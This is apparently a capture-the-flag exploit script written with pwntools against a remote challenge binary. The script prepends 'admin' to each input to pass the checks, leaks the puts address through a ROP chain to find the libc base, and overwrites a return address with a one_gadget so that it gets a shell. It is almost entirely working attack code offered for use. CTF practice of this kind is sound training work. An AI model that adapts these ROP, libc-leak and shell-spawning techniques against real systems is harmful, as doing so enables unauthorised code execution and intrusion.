第二个验证竟然是 md5 算法,得输入 admin 字符串
from pwn import *
from struct import pack
from ctypes import *
from LibcSearcher import *
import base64
def s(a):
    """Write raw bytes to the global tube ``p`` without a trailing newline."""
    payload = a
    p.send(payload)
def sa(a, b):
    """Block until ``a`` is read from the global tube ``p``, then send ``b``."""
    marker, payload = a, b
    p.sendafter(marker, payload)
def sl(a):
    """Write ``a`` plus a newline to the global tube ``p``."""
    line = a
    p.sendline(line)
def sla(a, b):
    """Block until ``a`` is read from the global tube ``p``, then send ``b`` plus a newline."""
    marker, line = a, b
    p.sendlineafter(marker, line)
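def r():
    """Receive whatever is pending on the global tube ``p`` and return it.

    The original discarded the received bytes, so a caller could only see
    them through the debug log. Returning them keeps the existing
    "drain the buffer" use unchanged while making the data available.

    Returns:
        The bytes produced by ``p.recv()``.
    """
    return p.recv()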
def pr():
    """Receive whatever is pending on the global tube ``p`` and print it."""
    received = p.recv()
    print(received)
def rl(a):
    """Read from the global tube ``p`` up to and including ``a``; return the bytes read."""
    delimiter = a
    chunk = p.recvuntil(delimiter)
    return chunk
def inter():
    """Hand the global tube ``p`` over to the user's terminal."""
    tube = p
    tube.interactive()
def debug():
    """Attach gdb to the global tube ``p`` and then pause the script.

    Only meaningful for a local ``process()`` tube; ``p`` is a ``remote()``
    tube in this file as written.
    """
    target = p
    gdb.attach(target)
    # Pause so the script does not race ahead before the debugger is ready.
    pause()
def get_addr():
    """Read the global tube ``p`` up to a 0x7f byte and decode the last 6 bytes as a u64.

    The 6 bytes ending in 0x7f are zero-padded to 8 bytes before
    ``u64`` is applied; endianness follows the pwntools ``context``.
    """
    raw = p.recvuntil(b'\x7f')
    tail = raw[-6:]
    padded = tail.ljust(8, b'\x00')
    return u64(padded)
def get_sb():
    """Return ``(system, "/bin/sh")`` addresses rebased on the global ``libc_base``.

    Relies on the module-level ``libc`` ELF object and ``libc_base``; the
    string address is the first match ``libc.search`` yields.
    """
    system_addr = libc_base + libc.sym['system']
    binsh_addr = libc_base + next(libc.search(b'/bin/sh\x00'))
    return system_addr, binsh_addr
# log_level='debug' makes pwntools echo every byte sent and received; the
# script has no other output for the tube traffic.
context(os='linux', arch='amd64', log_level='debug')
#p = process('./pwn')
# Hard-coded challenge endpoint; there is no local fallback unless the
# process() line above is re-enabled.
p = remote('node4.anna.nssctf.cn', 28976)
elf = ELF('./pwn')
#libc = ELF('./libc-2.27-x64.so')
# Absolute path on the author's machine. This particular libc build also
# fixes every symbol and raw offset used below, so it must match exactly.
libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')
# Hand-entered addresses for this specific './pwn' build (not looked up via
# elf.sym); they appear to be fixed, non-PIE addresses — verify against the
# ELF before trusting them. leave, ret and rsi_r15 are never used below.
leave = 0x40098e
ret = 0x400641
rdi = 0x401ab3
rsi_r15 = 0x401ab1
buf = 0x602400
#gdb.attach(p, 'b *0x401973')
# leak libc_base — each input is prefixed with b'admin', the check value the
# note at the top of the file describes.
sa(b'>', b'admin\x00\x00\x00' + p64(rdi) + p64(elf.got['puts']) + p64(0x4018B5))
sa(b'>', b'admin\x00'.ljust(0x20, b'\x00') + p64(buf))
libc_base = get_addr() - libc.sym['puts']
print(' libc_base -> ', hex(libc_base))
# pwn
# system/binsh are computed but not used by the sends below.
system, binsh = get_sb()
# 0x4527a is a hand-entered offset tied to the libc selected above; it is not
# derived from the file at runtime.
one_gadget = libc_base + 0x4527a
sa(b'>', b'admin\x00\x00\x00' + p64(0)*2 + p64(one_gadget))
sa(b'>', b'admin\x00\x00\x00'*4)
inter()
#pause()
